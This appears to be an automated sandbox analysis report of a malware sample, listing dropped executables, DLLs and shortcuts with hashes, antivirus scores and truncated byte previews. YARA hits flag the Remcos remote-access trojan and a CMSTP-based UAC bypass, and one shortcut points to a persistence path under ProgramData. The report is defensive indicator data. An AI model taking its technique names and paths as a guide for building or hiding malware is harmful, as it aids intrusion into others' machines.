                                                                                                            Preview:.PNG........IHDR.......C.......,4....sRGB.........bKGD..............pHYs...9...9...F....tIME.....8..v0j....iTXtComment.....Created with GIMPd.e... .IDATx..y..Gy...}M.fF..iY.!.........!.$...9...6$\.4....bgm.`...N.......,...X..e.l.#.4.9.~..?.....o..3:...?...y...W.......c../..+..r.\+..r.\....G~...7.....k.......2.B......`q...8.5....7K.......L..w#qa... .c..D......tH. .r..%.~.<..9K..g[.....x./...d.W`an..........k....y.g@...B....0..>.[.......J!.)..<".0.1!BC...L....E.].DtH..":.K..&"tuK."....&B.PD...=NZ.q&:.vXE[.E...{t.?A../.Kzx....d.P.".9..B....*;.D.#%..##."#...MF.../N.~m.W{........{.......>d.<....l.7..(......r.+{..2d|.].....ON.{..\.....b.OV.....+.8.....M4B .@U.s..XR.8k.O..xz....FkK...=.l..r_......:u...W.A.B.......0...q.ym.B6..&...FC.h....IO.N$P.<.u..q.E......H-.S..l.,13...8]B..|...{j....I6...r0...u..-.yZh..X/`@..x..A.Te.K..>.tX9.]...<..".B.)..eY..y. @UUTE..^vA..h$3......e..t...^4.F1.......E...J..`..bth."Z.#......G..........T.=`!.....!...T..
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695859208984458
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:teHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:teHbLFeHKO8F
                                                                                                            MD5:52677313E564E264BF1E26F01AA9D7FF
                                                                                                            SHA1:697C265EDCB4E8DD77EBB6D3B84C38BAEAA35357
                                                                                                            SHA-256:F7E2B0C26261ACD897DCD20AE79FDC8D7ED8A2846FB2A0CFC59350351A815EE1
                                                                                                            SHA-512:48544992FDB1A6BCEE18328A99D5FC4608A40F83DFD46C8852B97897A5368C9C63105B7D9958DC72E81C896E49E790B2C997E63DBAF75DFD18A2B5A2DF1F1057
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695861087107369
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:KeHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:KeHbLFeHKO8F
                                                                                                            MD5:2320011D9D5A4734B8C9FE6C49E66A9B
                                                                                                            SHA1:AFD4AFD2266CFDAC7277B56A7E5383BA7686CF00
                                                                                                            SHA-256:0CED2906ECE4467FCCF1FE33BBED6AC485ECDD7B5EB20D1110339BADE4D95F28
                                                                                                            SHA-512:C040DCB2C0239D38E44BC0171736710B52FF6D53EC389550D114CFF23654BB12014A35938D472B3A583B2EB3586775938FC4746A9497C9B4525FABAC83849C5C
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695861287428844
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:KeHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:KeHbLFeHKO8F
                                                                                                            MD5:E705389BBE7E610D9DC5FF691E8AB436
                                                                                                            SHA1:D0A8691B508B50FCE166A3432C716EF4BC6EA0B4
                                                                                                            SHA-256:422A0BE7A74F87B46D4A0B474E63C6CD98DA7950228A4E4A91C18617593A02E6
                                                                                                            SHA-512:924A157E14506DDEB9CA3191FEB8A96461848ED42A7FB4C4D0D7C831637F3D14A71307CDE8F9E55404F3700F01AF27E49B554592B482118E3030536ECD1C712E
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695861736865564
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:heHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:heHbLFeHKO8F
                                                                                                            MD5:F23AE3CCEE146D9731C242D9F705F501
                                                                                                            SHA1:527881C87333529B3D7914818834A41FF2E95E11
                                                                                                            SHA-256:2E82FAD1FA824A4DADDB17BD52EDB484EA1E046A19CB4C663FC7DC9B9868F2F2
                                                                                                            SHA-512:6954E697873E12CD8314FBAF4BBA1B62D955FF841E21794534BC943439875E7F28531183002F4D0CEBE4A47882A4FADE577E0BADCBC033990737B410F7CCDC3A
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):500736
                                                                                                            Entropy (8bit):6.582878001257931
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:w/7iPrcL3ArwhBq7Kjsn9iHGXg0lwGS9MNNhdFvPxps9gsAOZZAAXgc7S7ovz:w/uPq3AfK496Gw0lwGXN3pvs/ZA58vz
                                                                                                            MD5:16EC8B91B5461B1C810DCCDEAD6DE87F
                                                                                                            SHA1:FC9F07EE1F1BC5CC09F290B935BECC85223970E7
                                                                                                            SHA-256:C71E4D86B24B883F8DAF83CD2E3F689283185CF1DB4BDEFBEE213E50550CF968
                                                                                                            SHA-512:8EBD977810D7AD3AB051EC9F3BA18DB48FAE5FA2399ABD7E4C202C4551167B1394FACA42789AE0FEF636F90E1E29F69541009671BB45D13E4A8986D480889997
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: unknown
                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: unknown
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\dsx, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..~........PE..L....TCX.................r..........=I............@..........................@...........................................................J.......................;..@...8...........................x...@............................................text....p.......r.................. ..`.rdata...y.......z...v..............@..@.data...4]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....J.......L..................@..@.reloc...;.......<...P..............@..Bumlwqq... ... ......................@...........................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 26 05:02:16 2023, mtime=Fri Nov 29 23:25:22 2024, atime=Thu Oct 26 05:02:16 2023, length=20680, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):992
                                                                                                            Entropy (8bit):5.015403643419632
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:8mWIVDolXlX0RCgKOZqCAQaIoo9pLfHfzqygm:8mtVDol1kRZqVqpfHfWyg
                                                                                                            MD5:BCEFB8D76142596CA8360D64C0C971F6
                                                                                                            SHA1:12F7C9A6F90D69F84086D60A159CB1BBE55E5D4F
                                                                                                            SHA-256:A63489EC53845D2575DE322D68D1AFAFB3BA07DF170A16A95358F2DBEDDD11C5
                                                                                                            SHA-512:63F431D1E6FD7E2C9D11EC128187269533FF18DF3724937CE958B3F0BDEC710F6F145680267C13D4EE917982CDA5301D203C1D96EDB51A4ABDBE6CBA9F3E501B
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F.... .............X.B..........P........................:..DG..Yr?.D..U..k0.&...&.......$..S....p.B.B.....].B......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2~Y.............................^.A.p.p.D.a.t.a...B.P.1.....~Y&...Local.<......EW<2~Y&.....[.......................`.L.o.c.a.l.....N.1.....~Y....Temp..:......EW<2~Y......^......................w..T.e.m.p.....f.2..P..ZWH0 .EHttpSrv.exe..J......ZWH0~Y&.....P.........................E.H.t.t.p.S.r.v...e.x.e.......`...............-......._..............P.....C:\Users\user\AppData\Local\Temp\EHttpSrv.exe......\.E.H.t.t.p.S.r.v...e.x.e.........|....I.J.H..K..:...`.......X.......571345...........hT..CrF.f4... .^}......-...-$..hT..CrF.f4... .^}......-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):904880
                                                                                                            Entropy (8bit):6.130048225121867
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:CouStsPOf+YVeAVWiqnm5dVjPiqW95XZxByK0Dp:CouStsPOf+2nVWiqnm5dVjPiV95xyKGp
                                                                                                            MD5:4366CD6C5D795811822B9CCC3DF3EAB4
                                                                                                            SHA1:30F6050729B4C08B7657454CB79DD5A3D463C606
                                                                                                            SHA-256:55497A3ECED5D8D190400BCD1A4B43A304EBF74A0D6D098665474ED4B1B0E9DA
                                                                                                            SHA-512:4A56A2DA7DED16125C2795D5760C7C08A93362536C9212CFF3A31DBF6613CB3FCA436EFD77C256338F5134DA955BC7CCC564B4AF0C45AC0DFD645460B922A349
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........XboRXboRXboR..RYboR...RQboR...RIboR...REboRXbnR.aoR...RHboR...R.boR...RYboR...RYboR...RYboRRichXboR........................PE..L...K..K...........!..... ...p......j........0....@ ....................................................................g...|........`...<...........................;..............................(=..@............0..x............................text............ .................. ..`.rdata.......0.......0..............@..@.data....(...0...0...0..............@....rsrc....<...`...@...`..............@..@.reloc..^...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1093120
                                                                                                            Entropy (8bit):6.520969816214873
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:wsaHmJ//R12t2PdMvWxMIQ1zoKyK0ivyHCJKjswl/KY6oQy3AmgVk2YDFpR7m81H:KHmJ+tKtxMIQNmCcjswl/KYh/2YFnb
                                                                                                            MD5:686B224B4987C22B153FBB545FEE9657
                                                                                                            SHA1:684EE9F018FBB0BBF6FFA590F3782BA49D5D096C
                                                                                                            SHA-256:A2AC851F35066C2F13A7452B7A9A3FEE05BFB42907AE77A6B85B212A2227FC36
                                                                                                            SHA-512:44D65DB91CEEA351D2B6217EAA27358DBC2ED27C9A83D226B59AECB336A9252B60AEC5CE5E646706A2AF5631D5EE0F721231EC751E97E47BBBC32D5F40908875
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R..............R.......R...............l......n......l......l......l......l.L....l......l......l.....Rich............PE..L...(YYJ...........!.....p...\.......U.............x.................................M....@..............................e......x.......................................................................@...............4............................text....n.......p.................. ..`.data....k.......J...t..............@....rsrc...............................@..@.reloc..V7.......8...v..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):632656
                                                                                                            Entropy (8bit):6.854474744694894
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:bxzh9hH5RVKTp0G+vjhr46CIw+0yZmGyYCj:bph9hHzVKOpXwymGyYo
                                                                                                            MD5:1169436EE42F860C7DB37A4692B38F0E
                                                                                                            SHA1:4CCD15BF2C1B1D541AC883B0F42497E8CED6A5A3
                                                                                                            SHA-256:9382AAED2DB19CD75A70E38964F06C63F19F63C9DFB5A33B0C2D445BB41B6E46
                                                                                                            SHA-512:E06064EB95A2AB9C3343672072F5B3F5983FC8EA9E5C92F79E50BA2E259D6D5FA8ED97170DEA6D0D032EA6C01E074EEFAAB850D28965C7522FB7E03D9C65EAE0
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.........@................!......;.............d.......................Rich...................PE..L...yLYJ...........!.....0...p......+#.......@.....x......................................@..........................q...~..Pc..<....`..................P....p..P3...B...............................F..@............@...............................text....'.......0.................. ..`.rdata......@.......@..............@..@.data...Li.......P..................@....rsrc........`.......@..............@..@.reloc...7...p...@...P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:7694F4A66316E53C8CDD9D9954BD611D
                                                                                                            SHA1:22EA1C649C82946AA6E479E1FFD321E4A318B1B0
                                                                                                            SHA-256:8E35C2CD3BF6641BDB0E2050B76932CBB2E6034A0DDACC1D9BEA82A6BA57F7CF
                                                                                                            SHA-512:2E96772232487FB3A058D58F2C310023E07E4017C94D56CC5FAE4B54B44605F42A75B0B1F358991F8C6CBE9B68B64E5B2A09D0AD23FCAC07EE9A9198A745E1D5
                                                                                                            Malicious:false
                                                                                                            Preview:q
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):500736
                                                                                                            Entropy (8bit):6.582878001257931
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:w/7iPrcL3ArwhBq7Kjsn9iHGXg0lwGS9MNNhdFvPxps9gsAOZZAAXgc7S7ovz:w/uPq3AfK496Gw0lwGXN3pvs/ZA58vz
                                                                                                            MD5:16EC8B91B5461B1C810DCCDEAD6DE87F
                                                                                                            SHA1:FC9F07EE1F1BC5CC09F290B935BECC85223970E7
                                                                                                            SHA-256:C71E4D86B24B883F8DAF83CD2E3F689283185CF1DB4BDEFBEE213E50550CF968
                                                                                                            SHA-512:8EBD977810D7AD3AB051EC9F3BA18DB48FAE5FA2399ABD7E4C202C4551167B1394FACA42789AE0FEF636F90E1E29F69541009671BB45D13E4A8986D480889997
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: unknown
                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: unknown
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Updwork.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 29 23:25:30 2024, mtime=Fri Nov 29 23:25:30 2024, atime=Thu Nov 28 17:56:30 2024, length=506816, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):857
                                                                                                            Entropy (8bit):4.554210321205124
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:86n01xcVeresXl+yiwiScgxwUFjEjAANp+Ub9Yw/wUCpyKfpoKf9mV:8Q0HpCwYgxw4QAM59Yw/wHpdfBf9m
                                                                                                            MD5:F89088874F88C841C18BEE95F15F7B2D
                                                                                                            SHA1:822052F04F2A05D67CDE12745ED4619D0E4F6DD0
                                                                                                            SHA-256:93A3941DA217BDCFF7C0228151ABFF6353EADD571337A550840F6A65E998383A
                                                                                                            SHA-512:8492B200AB8F663957AE7FE18A4C65BF3B15A162D4B1FE21A95857D5AC7970B2DEC338B6BB3CE75E84EA1A4592A0213912A70FA0B28CC9CEAEE4E1F6D74C4792
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F.... ..`..\.B..`..\.B.....<.A..........................k....P.O. .:i.....+00.../C:\...................`.1.....~Y0.. PROGRA~3..H......O.I~Y0.....g.....................# ..P.r.o.g.r.a.m.D.a.t.a.....h.1.....~Y0.. RAFTEL~1..P......~Y0.~Y0............................!..R.a.f.t.e.l.i.b.e.G.a.s.r.s.s.....t.2.....|Y.. RAFTEL~1.EXE..X......~Y0.~Y0...............................R.a.f.t.e.l.i.b.e.G.a.s.r.s.s...e.x.e.......a...............-.......`..............P.....C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe..J.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.R.a.f.t.e.l.i.b.e.G.a.s.r.s.s.\.R.a.f.t.e.l.i.b.e.G.a.s.r.s.s...e.x.e.`.......X.......571345...........hT..CrF.f4... ..]}......-...-$..hT..CrF.f4... ..]}......-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3815
                                                                                                            Entropy (8bit):5.25424641458202
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:WTYT2hTD3bQ/6hrAHec2h3h3hpiiyrrT67sOjKpcF6:WTo8TDrDrAHIxxOpcF6
                                                                                                            MD5:83F4E467753C1B23BE4D80E223285AC7
                                                                                                            SHA1:75259894EB4AF02E446EF4B08618EFC8684AF46A
                                                                                                            SHA-256:E69FFFEC66E23B357EC72C4E0D9BF3CC636C718453A9197BF0383F1F3175972F
